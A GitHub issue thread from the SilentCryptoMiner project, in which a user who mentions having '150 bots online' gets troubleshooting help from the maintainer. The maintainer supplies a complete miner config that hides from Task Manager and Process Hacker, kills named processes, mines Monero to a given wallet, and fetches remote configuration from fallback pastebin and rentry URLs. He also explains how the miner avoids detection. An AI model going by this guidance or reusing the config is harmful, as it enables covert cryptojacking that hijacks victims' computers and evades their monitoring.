### ISSUE TITLE
Windows 7 does miner support ?

### ISSUE THREAD

**Issue by svox07** [UnamSanctam/SilentCryptoMiner#1571]
Unam, hello, I wanted to clarify, the miner supports Windows 7?

**Comment by svox07** [comment]
the left ip connects with the miner, it is not immediately shown, and some time passes and exits and disappears after a while
![Uploading IMG_20230503_022124_271__01.jpg…]()

**Comment by svox07** [comment]
the left ip connects with the miner, it is not immediately shown, and some time passes and exits and disappears after a while
![IMG_20230503_022124_271__01](https://user-images.githubusercontent.com/70852343/235777734-ad99a210-3ec6-4302-9c87-109eb2dc3808.jpg)

**Comment by UnamSanctam** [comment]
>Unam, hello, I wanted to clarify, the miner supports Windows 7?

Yes the miner supports Windows 7,

>the left ip connects with the miner, it is not immediately shown, and some time passes and exits and disappears after a while

Are you saying that it disconnects from the pool and the miner exits in Windows 7 for you?

**Comment by svox07** [comment]
had in mind when the miner is running then and this ip address 185.195.233.151 starts with the miner but does not cost long

**Comment by UnamSanctam** [comment]
>had in mind when the miner is running then and this ip address 185.195.233.151 starts with the miner but does not cost long

Hmm, do you have "Remote Configuration" enabled? Or I guess it could also be something with the pool. I test ran the miner for two hours and it didn't appear for me so that's why I'm not sure.

**Comment by svox07** [comment]
yes remote pastebin settings enabled think this is pastebin?  can you advise the most stable remote settings

**Comment by UnamSanctam** [comment]
>yes remote pastebin settings enabled think this is pastebin? can you advise the most stable remote settings

Could have possible been something like it or something (might not have been pastebin itself but something that they called), and what do you mean by the most stable remote settings?

**Comment by svox07** [comment]
I meant which one is a good pastebin or rentry

**Comment by UnamSanctam** [comment]
>I meant which one is a good pastebin or rentry

Both are good, you can use both of them (or any others as well) and then add them all into the miner. Like so: `https://pastebin.com/raw/yourlink,https://rentry.co/yourlink/raw`

**Comment by svox07** [comment]
won't they conflict with each other?

**Comment by UnamSanctam** [comment]
>won't they conflict with each other?

It stops after the first one that works, so you can have any amount or URLs and it will automatically only use the first one of the URLs that work. So if you enter this: https://pastebin.com/raw/yourlink,https://rentry.co/yourlink/raw, then it will always only use the pastebin link until it stops working, if the pastebin link stops working then it will use the rentry link instead.

**Comment by svox07** [comment]
Unam can explain this by showing an example of how to apply it
![Screenshot_20230504-102826](https://user-images.githubusercontent.com/70852343/236115241-910df366-a431-4ec0-b7d5-a48d2871dbae.jpg)


"remote-config": "Remote Configuration URL",

**Comment by UnamSanctam** [comment]
In the "Remote Configuration" or the web panel "Configurations" you can change which URLs it uses by adding the following setting:
`"remote-config": "https://pastebin.com/raw/yourlink,https://rentry.co/yourlink/raw"`

**Comment by svox07** [comment]
example is right?


{
	"algo": "rx/0",
	"pool": "xmr-eu2.nanopool.org",
	"port": 14433,
	"wallet": "8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N",
	"password": "",
	"rig-id": "",
	"keepalive": false,
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 10,
	"idle-wait": 1,
	"idle-cpu": 50,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "program1.exe,program2.exe,program3.exe",
	"stealth-fullscreen": false
        "remote-config": "https://pastebin.com/raw/yourlink,https://rentry.co/yourlink/raw"
}

**Comment by UnamSanctam** [comment]
Yes except that you would add a comma to the end of `"stealth-fullscreen": false` so that it would be:`

```
{
"algo": "rx/0",
"pool": "xmr-eu2.nanopool.org",
"port": 14433,
"wallet": "8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N",
"password": "",
"rig-id": "",
"keepalive": false,
"nicehash": false,
"ssltls": true,
"max-cpu": 10,
"idle-wait": 1,
"idle-cpu": 50,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "program1.exe,program2.exe,program3.exe",
"stealth-fullscreen": false,
"remote-config": "https://pastebin.com/raw/yourlink,https://rentry.co/yourlink/raw"
}
```

With those settings then it would change to start using `https://pastebin.com/raw/yourlink,https://rentry.co/yourlink/raw` as the "Remote Configuration" URLs.

**Comment by svox07** [comment]
unam hello firewall may be blocking connection to the pool ?

**Comment by UnamSanctam** [comment]
It shouldn't, why do you ask? Are you unable to connect to a pool?

**Comment by svox07** [comment]
I have a miner running but I can't connect to the pool, I think it's a firewall blocking or pastebin is not working correctly

**Comment by svox07** [comment]
the miner is running, but there is no connection with the pool

**Comment by UnamSanctam** [comment]
Usually your firewall won't block it, it's more common to be something else blocking it such as your ISP, or the settings being wrong. Is it using CPU/GPU? Since the miner will only appear on the pool when you find a share. Or do you mean that there is no connection visible when you sniff the traffic?

**Comment by svox07** [comment]
when I open Process Hacker I look in the Network section, there should be a connection with the pool, but sometimes it does not appear and the pool does not fight back from me 150 bots online, of which 70 of them show the pool

**Comment by UnamSanctam** [comment]
>when I open Process Hacker I look in the Network section, there should be a connection with the pool, but sometimes it does not appear and the pool does not fight back from me 150 bots online, of which 70 of them show the pool

Maybe it's not being reliable in showing the connection inside Process Hacker? You can turn off "Stealth" in the miner and check if it uses any CPU/GPU (depending on what you're mining), if it does use any then it's connected to the pool and mining. Sometimes all miners won't show in the pool if it takes long for them to submit a share, since some pools only show miners who have submitted a share in the last 15-30 minutes.
